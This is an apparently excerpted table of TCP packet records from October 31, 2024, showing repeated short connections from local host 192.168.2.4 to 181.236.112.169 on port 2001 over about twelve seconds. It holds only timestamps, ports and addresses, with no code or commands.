Oct 31, 2024 07:42:10.801986933 CET  2001      49833     181.236.112.169  192.168.2.4
Oct 31, 2024 07:42:10.802062035 CET  49833     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:42:10.802122116 CET  49833     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:42:10.807002068 CET  2001      49833     181.236.112.169  192.168.2.4
Oct 31, 2024 07:42:11.807681084 CET  49844     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:42:11.812767029 CET  2001      49844     181.236.112.169  192.168.2.4
Oct 31, 2024 07:42:11.812850952 CET  49844     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:42:11.813179016 CET  49844     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:42:11.818120956 CET  2001      49844     181.236.112.169  192.168.2.4
Oct 31, 2024 07:42:12.357122898 CET  2001      49844     181.236.112.169  192.168.2.4
Oct 31, 2024 07:42:12.357183933 CET  49844     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:42:12.357249022 CET  49844     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:42:12.362209082 CET  2001      49844     181.236.112.169  192.168.2.4
Oct 31, 2024 07:42:13.370584011 CET  49853     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:42:13.377155066 CET  2001      49853     181.236.112.169  192.168.2.4
Oct 31, 2024 07:42:13.377221107 CET  49853     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:42:13.377765894 CET  49853     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:42:13.382962942 CET  2001      49853     181.236.112.169  192.168.2.4
Oct 31, 2024 07:42:13.954794884 CET  2001      49853     181.236.112.169  192.168.2.4
Oct 31, 2024 07:42:13.954902887 CET  49853     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:42:13.954966068 CET  49853     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:42:13.959804058 CET  2001      49853     181.236.112.169  192.168.2.4
Oct 31, 2024 07:42:14.932799101 CET  49861     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:42:14.937860966 CET  2001      49861     181.236.112.169  192.168.2.4
Oct 31, 2024 07:42:14.937952995 CET  49861     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:42:14.938355923 CET  49861     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:42:14.943128109 CET  2001      49861     181.236.112.169  192.168.2.4
Oct 31, 2024 07:42:15.488902092 CET  2001      49861     181.236.112.169  192.168.2.4
Oct 31, 2024 07:42:15.489003897 CET  49861     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:42:15.489068031 CET  49861     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:42:15.493891001 CET  2001      49861     181.236.112.169  192.168.2.4
Oct 31, 2024 07:42:16.433114052 CET  49872     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:42:16.438141108 CET  2001      49872     181.236.112.169  192.168.2.4
Oct 31, 2024 07:42:16.438230038 CET  49872     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:42:16.438779116 CET  49872     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:42:16.443624020 CET  2001      49872     181.236.112.169  192.168.2.4
Oct 31, 2024 07:42:16.994286060 CET  2001      49872     181.236.112.169  192.168.2.4
Oct 31, 2024 07:42:16.994406939 CET  49872     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:42:16.994502068 CET  49872     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:42:16.999506950 CET  2001      49872     181.236.112.169  192.168.2.4
Oct 31, 2024 07:42:17.906821966 CET  49881     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:42:17.911561012 CET  2001      49881     181.236.112.169  192.168.2.4
Oct 31, 2024 07:42:17.911649942 CET  49881     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:42:17.918639898 CET  49881     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:42:17.923470020 CET  2001      49881     181.236.112.169  192.168.2.4
Oct 31, 2024 07:42:18.460721016 CET  2001      49881     181.236.112.169  192.168.2.4
Oct 31, 2024 07:42:18.460791111 CET  49881     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:42:18.460872889 CET  49881     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:42:18.465761900 CET  2001      49881     181.236.112.169  192.168.2.4
Oct 31, 2024 07:42:19.339102983 CET  49889     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:42:19.343934059 CET  2001      49889     181.236.112.169  192.168.2.4
Oct 31, 2024 07:42:19.344019890 CET  49889     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:42:19.344348907 CET  49889     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:42:19.349137068 CET  2001      49889     181.236.112.169  192.168.2.4
Oct 31, 2024 07:42:19.905015945 CET  2001      49889     181.236.112.169  192.168.2.4
Oct 31, 2024 07:42:19.905102015 CET  49889     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:42:19.905165911 CET  49889     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:42:19.909960985 CET  2001      49889     181.236.112.169  192.168.2.4
Oct 31, 2024 07:42:20.760952950 CET  49899     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:42:20.765873909 CET  2001      49899     181.236.112.169  192.168.2.4
Oct 31, 2024 07:42:20.765980959 CET  49899     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:42:20.766371965 CET  49899     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:42:20.771145105 CET  2001      49899     181.236.112.169  192.168.2.4
Oct 31, 2024 07:42:21.309994936 CET  2001      49899     181.236.112.169  192.168.2.4
Oct 31, 2024 07:42:21.310101032 CET  49899     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:42:21.310157061 CET  49899     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:42:21.315084934 CET  2001      49899     181.236.112.169  192.168.2.4
Oct 31, 2024 07:42:22.239376068 CET  49910     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:42:22.244115114 CET  2001      49910     181.236.112.169  192.168.2.4
Oct 31, 2024 07:42:22.244182110 CET  49910     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:42:22.244554996 CET  49910     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:42:22.249378920 CET  2001      49910     181.236.112.169  192.168.2.4
Oct 31, 2024 07:42:22.824367046 CET  2001      49910     181.236.112.169  192.168.2.4
Oct 31, 2024 07:42:22.824440002 CET  49910     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:42:22.824481964 CET  49910     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:42:22.829380989 CET  2001      49910     181.236.112.169  192.168.2.4
                                                                                              Oct 31